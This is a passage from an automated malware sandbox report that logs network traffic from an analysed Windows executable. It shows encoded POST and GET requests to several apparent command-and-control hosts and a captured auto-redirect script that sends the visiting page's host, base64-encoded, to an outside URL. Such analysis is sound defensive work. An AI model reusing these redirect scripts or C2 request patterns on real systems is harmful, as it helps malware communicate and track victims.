                                                          Data Ascii: 9V7X=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we8MoPnTnN8xAKvyXTObuzl0ROrjtxtCjYGn+pZABTYW7Jx/DThdzs48jpVaJD1NUA2dKAkVvb//xBOgjY7r5JdrXMmxzJmQgj4+e+Adw+s1u3kuTqepDCORCfamYQkYT8cURHm7nkhDg41ncr6fZd0TpSFplS1sJ4zJFFGQgFH1Awcz3M0fW+vLOvsMfN/uuRjajnwk2w7BpZHH63qNnC/4DmMU/lKSfjxcLcqj84DOhQtlCmhEeGZBFP+iS6VezUoYI+x6UCXnsJUtF2n2ZST1Gvth58qNeSVlsrxguAKPQG69C0uQy9UKylVIUFpNYcf93MFxKIWTnLQ8VCI4PryojYy2lluIIESYrE6a4taxQeUKBUM983ztVzhapZ/0dwrTJphaZq+tKLU4kk1L0+xr+RaXqHYfB+j8vQaIj0nkiKAfqef3oLNV2oKQ0RdBmqWtZYQoo9GxGno1ZtRT9lKVUvh+5ELiUKgsBfSwQ4pE3yI4mubtAZ027M9XIjd5qT2b0sfP4QcPruNgXNZ9BoiMcVwEcMzxZg3FiSuZDh98PP06kT6uf5GJbxBLUVvTVhxyWwU+6s/BzfVlTaxKKTfjBaWtA/cxhOyF1tTkSpsDCUckz8EBhqc0QxDTS87/BIKO2IOvazStVBFHMNQz5okuWX+Ehe54tRs9sw1gIiPfTnz0pOMH3lDW5rxMufwC1mzF1VQ8SolEI1e8xYwYLC4oYdEJ2eSKzwybOIsKGqQQ2rncXH2ZKpKXmbSuGhPz9bmq6wCEnfw8xk9quaVdtyxgtgidCbZk2q44Xoqwn0UTnc3T8qFiVIdL9YupKyM8pPSqRZN2e3IgI/nLDHAo/UIRVwmnRFDzMvj9K/K9YNolQo310NgkgQ8NEXRI/PZTZS8CZllUnheh0UA2Myorh6CfaJoQUMT1ednu4cqGPfkHmERv1Aivhxv4XleXId6x4AiVArhj [TRUNCATED]
                                                          Jan 11, 2025 01:01:48.504317999 CET533INHTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 358
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.64998923.225.159.42806748C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:01:50.552114964 CET499OUTGET /sgdd/?9V7X=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&WldT=UFzdV2kX3 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.laohub10.net
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Jan 11, 2025 01:01:51.076904058 CET533INHTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 358
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.649990149.88.81.190806748C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:01:56.648313046 CET750OUTPOST /rq1s/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.xcvbj.asia
                                                          Origin: http://www.xcvbj.asia
                                                          Referer: http://www.xcvbj.asia/rq1s/
                                                          Cache-Control: no-cache
                                                          Content-Length: 209
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 39 56 37 58 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 6d 73 79 56 74 71 48 67 47 4a 33 6e 30 6e 2b 6c 65 58 2f 62 76 58 31 6d 69 43 48 37 42 35 53 36 6b 4e 68 56 4e 47 75 73 65 31 2f 31 6d 36 6f 63 4f 4d 76 6e 76 7a 63 4d 5a 30 45 53 76 6e 6b 31 39 79 59 67 31 42 33 73 61 6f 32 67 79 70 45 6e 64 71 2f 74 6f 42 30 53 79 43 57 4e 41 73 4c 51 71 74 6f 74 61 57 59 77 68 32 31 73 51 75 57 64 76 6e 6b 4e 4b 53 7a 42 4f 4b 79 47 6e 64 46 75 49 61 44 48 2f 41 2b 44 38 4a 79 39 2b 58 4c 35 75 68 6e 4a 6c 47 4a 4e 55 79 46 2b 6d 75 79 76 6d 68 68 7a 42 53 64 4d 63 33 4e 4b 36 55 76 66 69 4a 71 2f 4a 67 48 4f 42 75 2b 62 63 38 30
                                                          Data Ascii: 9V7X=xj4K+ejgT/JOWmsyVtqHgGJ3n0n+leX/bvX1miCH7B5S6kNhVNGuse1/1m6ocOMvnvzcMZ0ESvnk19yYg1B3sao2gypEndq/toB0SyCWNAsLQqtotaWYwh21sQuWdvnkNKSzBOKyGndFuIaDH/A+D8Jy9+XL5uhnJlGJNUyF+muyvmhhzBSdMc3NK6UvfiJq/JgHOBu+bc80


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.649991149.88.81.190806748C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:01:59.194875002 CET774OUTPOST /rq1s/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.xcvbj.asia
                                                          Origin: http://www.xcvbj.asia
                                                          Referer: http://www.xcvbj.asia/rq1s/
                                                          Cache-Control: no-cache
                                                          Content-Length: 233
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 39 56 37 58 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 52 53 6a 41 42 68 62 70 61 75 67 2b 31 2f 39 47 36 70 53 75 4d 6b 6e 76 32 70 4d 59 59 45 53 72 50 6b 31 2f 36 59 68 47 70 30 75 4b 6f 6a 35 43 70 47 6a 64 71 2f 74 6f 42 30 53 79 6e 37 4e 42 49 4c 4d 4c 64 6f 73 37 57 62 7a 68 32 79 72 51 75 57 5a 76 6e 67 4e 4b 53 30 42 4c 54 36 47 6b 31 46 75 49 4b 44 47 75 41 2f 5a 73 4a 38 35 2b 57 65 35 64 56 6a 42 57 2f 6b 53 43 6d 46 6d 30 4b 75 71 51 38 37 76 79 53 2b 65 4d 58 50 4b 34 4d 64 66 43 4a 41 39 4a 59 48 63 57 69 5a 55 6f 5a 58 73 47 6b 39 52 72 7a 71 44 62 57 74 4c 54 64 79 41 72 5a 4c 6d 51 3d 3d
                                                          Data Ascii: 9V7X=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7URSjABhbpaug+1/9G6pSuMknv2pMYYESrPk1/6YhGp0uKoj5CpGjdq/toB0Syn7NBILMLdos7Wbzh2yrQuWZvngNKS0BLT6Gk1FuIKDGuA/ZsJ85+We5dVjBW/kSCmFm0KuqQ87vyS+eMXPK4MdfCJA9JYHcWiZUoZXsGk9RrzqDbWtLTdyArZLmQ==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.649992149.88.81.190806748C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:02:01.741420031 CET1787OUTPOST /rq1s/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.xcvbj.asia
                                                          Origin: http://www.xcvbj.asia
                                                          Referer: http://www.xcvbj.asia/rq1s/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1245
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 39 56 37 58 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 4a 53 2f 6c 64 68 55 6f 61 75 68 2b 31 2f 69 32 36 73 53 75 4d 35 6e 72 61 6c 4d 5a 6b 55 53 74 4c 6b 30 61 32 59 77 48 70 30 30 61 6f 6a 6b 79 70 4c 6e 64 72 39 74 6f 52 4b 53 79 58 37 4e 42 49 4c 4d 49 56 6f 39 71 57 62 2f 42 32 31 73 51 75 4b 64 76 6d 33 4e 4b 61 43 42 4c 65 59 47 56 56 46 74 6f 36 44 46 63 34 2f 53 73 4a 2b 31 65 58 64 35 64 49 39 42 57 7a 4f 53 43 37 67 6d 33 57 75 6f 30 52 57 31 78 2b 32 4a 38 50 6f 53 70 4d 76 51 32 51 79 33 4f 30 61 55 56 2b 47 63 4e 39 64 6c 78 59 59 56 49 53 4c 4f 34 54 43 55 57 73 79 4d 5a 41 50 78 6f 4a 63 65 6f 71 6d 4b 59 51 2f 6b 65 65 43 4e 6f 32 73 6f 44 46 72 37 64 64 39 76 76 4b 45 31 77 2b 31 4b 45 5a 4b 57 77 42 34 4f 76 43 37 4a 42 47 75 6f 30 35 7a 69 68 38 6c 6f 7a 41 67 38 64 6a 52 2b 58 6a 51 2b 68 6a 6d 51 47 33 71 31 4f 6e 55 52 61 46 54 37 4a 39 2b 71 63 2f 2f 66 6d 75 37 43 39 64 6c 6a 57 4b 6c 46 [TRUNCATED]
                                                          Data Ascii: 9V7X=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7UJS/ldhUoauh+1/i26sSuM5nralMZkUStLk0a2YwHp00aojkypLndr9toRKSyX7NBILMIVo9qWb/B21sQuKdvm3NKaCBLeYGVVFto6DFc4/SsJ+1eXd5dI9BWzOSC7gm3Wuo0RW1x+2J8PoSpMvQ2Qy3O0aUV+GcN9dlxYYVISLO4TCUWsyMZAPxoJceoqmKYQ/keeCNo2soDFr7dd9vvKE1w+1KEZKWwB4OvC7JBGuo05zih8lozAg8djR+XjQ+hjmQG3q1OnURaFT7J9+qc//fmu7C9dljWKlFgUdCecnyvSUvEV7rOugR6Ne/76HFEvgpQzpFH0Co86RhU/v4Q7Zdukddz8rvPNLxUhhjFXZZMm+qHK+i87NS/WkSz15Zz8d9ARliYg7hwVMcjm3UpAw47iMFr4D1pMbhoeI8jY1i+XbzVELMvDY2p6OFZ35O9EEvih98uooFaGwzU3FReIU8JO1c7BUjdDZFUqYrVOk2prsjUC+C/H6+SKqr5+qdEiJdfLn+Jw389ksZqc34U5GwDrTGI391J1vqBSHUvGVrMbklVk8iItWs6oMJ3uDH8u+qK2DrJhNxaHb9ivWT70TGiLvQ+ECCf6+haa6g9D5EKFAMNnA3UNeBMkahJGWOUxvKLmagwooX//jWgpiQ+vHs8ifReyvQAIUUBlJBwlBa+lEWA06z3TV1mKA1SUbECuTdSezX/A5OhlTaeMg3Q2O5g46hcFXI56SRo3FETuKpBbs0c0HE3bUaxVcDOp/yHgWNJkRMKNpYTxc53fcUUeLtZsn/4mtzSv/+Z6sByzS5Bl4Kp0CkYUCjctVKS7rxY+0rQ8dsiJyfTY7hAOp071dJVb12uBjVoSS6Hra+y7LgrLEjOit/QslJwYUMl3RJjjTv9oQsyO79+OPb7zyEEYVwnzPeS96Ga2DZCqaduNNLmWNY/B5d2pnl/I4VT8zEZsRbDC [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.649993149.88.81.190806748C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:02:04.284415960 CET497OUTGET /rq1s/?9V7X=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF2aRhq0xPreKegZNgRyigK2URQJRetLL6xmvJtnHWTfyzSbGWdrg=&WldT=UFzdV2kX3 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.xcvbj.asia
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.64999585.159.66.93806748C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:02:30.788394928 CET759OUTPOST /rum2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.soainsaat.xyz
                                                          Origin: http://www.soainsaat.xyz
                                                          Referer: http://www.soainsaat.xyz/rum2/
                                                          Cache-Control: no-cache
                                                          Content-Length: 209
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 39 56 37 58 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 48 76 61 4c 35 69 4c 4f 6e 76 2f 34 51 4c 46 73 55 76 70 33 64 52 50 66 41 65 6b 6c 74 38 6a 32 30 31 6b 36 42 69 4c 61 61 44 58 6c 41 33 53 6d 49 6d 59 33 68 71 72 33 43 6b 4e 56 6c 4b 37 37 64 73 77 31 48 49 73 30 52 4e 61 73 73 39 53 55 56 44 61 76 34 71 5a 4c 55 78 2b 46 64 58 4b 44 33 33 72 38 37 59 32 59 59 76 55 48 59 73 63 4a 6f 48 78 43 71 44 4b 5a 33 43 55 57 42 2f 36 77 57 65 4f 66 41 57 6f 4f 58 6f 79 69 55 6c 72 46 4b 4a 52 6f 6f 59 63 45 46 71 32 56 6f 6a 46 32 41 2b 6b 39 74 4f 64 72 77 7a 68 79 38 7a 6c 6e 75 49 53 7a 6b 71 7a 47 6d 36 33 7a 54 57 49
                                                          Data Ascii: 9V7X=8OxGdHNGhDPGSHvaL5iLOnv/4QLFsUvp3dRPfAeklt8j201k6BiLaaDXlA3SmImY3hqr3CkNVlK77dsw1HIs0RNass9SUVDav4qZLUx+FdXKD33r87Y2YYvUHYscJoHxCqDKZ3CUWB/6wWeOfAWoOXoyiUlrFKJRooYcEFq2VojF2A+k9tOdrwzhy8zlnuISzkqzGm63zTWI


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.64999685.159.66.93806748C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:02:33.353890896 CET783OUTPOST /rum2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.soainsaat.xyz
                                                          Origin: http://www.soainsaat.xyz
                                                          Referer: http://www.soainsaat.xyz/rum2/
                                                          Cache-Control: no-cache
                                                          Content-Length: 233
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 39 56 37 58 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 59 6a 31 56 46 6b 67 46 32 4c 5a 61 44 58 72 67 33 54 73 6f 6d 47 33 68 75 56 33 47 6b 4e 56 6c 75 37 37 66 45 77 31 51 63 76 6d 78 4e 45 6b 4d 39 51 61 31 44 61 76 34 71 5a 4c 55 31 55 46 65 6e 4b 45 48 48 72 39 65 30 31 56 34 76 58 41 59 73 63 43 49 48 31 43 71 44 53 5a 79 62 50 57 44 48 36 77 57 4f 4f 65 56 36 72 48 58 6f 30 2f 45 6c 31 4c 2f 77 31 74 49 6c 49 4c 56 71 46 44 2f 72 32 36 57 6a 2b 68 65 4f 2b 35 67 54 6a 79 2b 72 58 6e 4f 49 34 78 6b 53 7a 55 78 32 51 38 6e 7a 72 77 79 6f 34 71 7a 5a 63 47 57 49 6a 43 75 56 45 75 4c 37 79 37 41 3d 3d
                                                          Data Ascii: 9V7X=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfYj1VFkgF2LZaDXrg3TsomG3huV3GkNVlu77fEw1QcvmxNEkM9Qa1Dav4qZLU1UFenKEHHr9e01V4vXAYscCIH1CqDSZybPWDH6wWOOeV6rHXo0/El1L/w1tIlILVqFD/r26Wj+heO+5gTjy+rXnOI4xkSzUx2Q8nzrwyo4qzZcGWIjCuVEuL7y7A==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.64999785.159.66.93806748C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:02:36.109380007 CET1796OUTPOST /rum2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.soainsaat.xyz
                                                          Origin: http://www.soainsaat.xyz
                                                          Referer: http://www.soainsaat.xyz/rum2/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1245
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 39 56 37 58 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 51 6a 31 6e 4e 6b 36 69 4b 4c 59 61 44 58 30 51 33 65 73 6f 6e 44 33 6c 43 52 33 47 67 33 56 6e 6d 37 39 4f 6b 77 69 52 63 76 2f 42 4e 45 6d 4d 39 54 55 56 43 61 76 34 61 6e 4c 55 46 55 46 65 6e 4b 45 42 4c 72 72 37 59 31 58 34 76 55 48 59 73 41 4a 6f 48 64 43 71 62 6f 5a 7a 4b 36 57 54 6e 36 78 79 53 4f 64 6e 69 72 49 58 6f 32 38 45 6b 6d 4c 2f 30 71 74 4c 42 45 4c 57 32 38 44 34 62 32 34 53 4f 71 78 64 75 70 75 42 50 6c 79 5a 48 54 67 5a 77 6b 35 6c 47 59 48 67 71 2f 39 32 66 6c 2f 48 4d 75 6f 44 4d 46 51 47 45 64 45 61 74 50 76 6f 4b 68 67 74 73 37 63 41 59 6b 52 2b 54 35 6a 45 46 54 44 6b 52 36 34 68 6a 51 71 4b 7a 37 4b 52 33 74 35 52 34 4f 46 36 2f 44 65 75 44 62 59 4f 38 45 32 45 4c 50 35 74 44 4a 51 69 67 4c 5a 74 69 4b 62 65 68 5a 52 79 75 39 49 4f 36 48 44 33 6c 34 6c 31 2b 32 54 37 78 71 50 58 74 45 76 45 41 64 79 4d 43 68 64 72 42 51 4d 68 41 42 48 [TRUNCATED]
                                                          Data Ascii: 9V7X=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfQj1nNk6iKLYaDX0Q3esonD3lCR3Gg3Vnm79OkwiRcv/BNEmM9TUVCav4anLUFUFenKEBLrr7Y1X4vUHYsAJoHdCqboZzK6WTn6xySOdnirIXo28EkmL/0qtLBELW28D4b24SOqxdupuBPlyZHTgZwk5lGYHgq/92fl/HMuoDMFQGEdEatPvoKhgts7cAYkR+T5jEFTDkR64hjQqKz7KR3t5R4OF6/DeuDbYO8E2ELP5tDJQigLZtiKbehZRyu9IO6HD3l4l1+2T7xqPXtEvEAdyMChdrBQMhABHAgx5NE3XaBGoY+Ezyvd23/+3rgkuGOjTIDU9Rd/WkO/As61dTh9muS38CvwRchcktNBPZa+pUYpFEVOKP9F4s7ecoRg9+Ebbbq7dASpVALVbS7sIOEFbCedPk36dzYfAf3OdyPs/eaRKMhFf4kJJ4xHtPDjW6VPJEgZ8Ta0cKSrUS2OeQjVHiGOtTeZFnTW3YD+myRPC/CqJKEKQ4SQomfBJw19orfHYdPLPqqz7A6/7QYv5ngoUXvyJbNJVmRXqMADQSIwpez0MzAhpTSn6riJ/94qBhpCzSPb9qKjHgBbQS+Joc7oYzJT/BQEMoKl2iNUJLLvNYweFCT2fEWlkJr59QajgANxpeiam/C15YqCrSiBdmVvMHbSZ7m92826oNA8ogth0McaVOIA6NA5P59mSl+wQg4AMwxPxOpcOzoXeoY13+wsalRI8ssyLgG274S3ftKTIWeHj+2G+IQweXn4WNnGuCzjS7YVmOmmDrIv8rv5xibIzkJStzuQI1h/yQk3UJbdYdEHL/X+BJGNOM1Gfm8NDFfT355457tKkMtOeNHjok+8iNlETm6Csd+9RzVDKFA+1SRpz2diEyEv1f1bycptdWn8/Il/y9UZj3hzcxg23umNRDUiwR98iKl5879lyFLb/nDs3ow+hAKVpXJv0MZiUKuJY1Y [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.64999985.159.66.93806748C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:02:38.707824945 CET500OUTGET /rum2/?9V7X=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBkidEg+kRQXv4obyNPkBDCtbUb3LL9ptfYbieFsxGE9yCAarRKSI=&WldT=UFzdV2kX3 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.soainsaat.xyz
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:19:00:43
                                                          Start date:10/01/2025
                                                          Path:C:\Users\user\Desktop\uG3I84bQEr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\uG3I84bQEr.exe"
                                                          Imagebase:0x400000
                                                          File size:1'762'816 bytes
                                                          MD5 hash:22B40728C8FB1599479347BA89387EF4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:19:00:44
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                          Imagebase:0x400000
                                                          File size:1'658'880 bytes
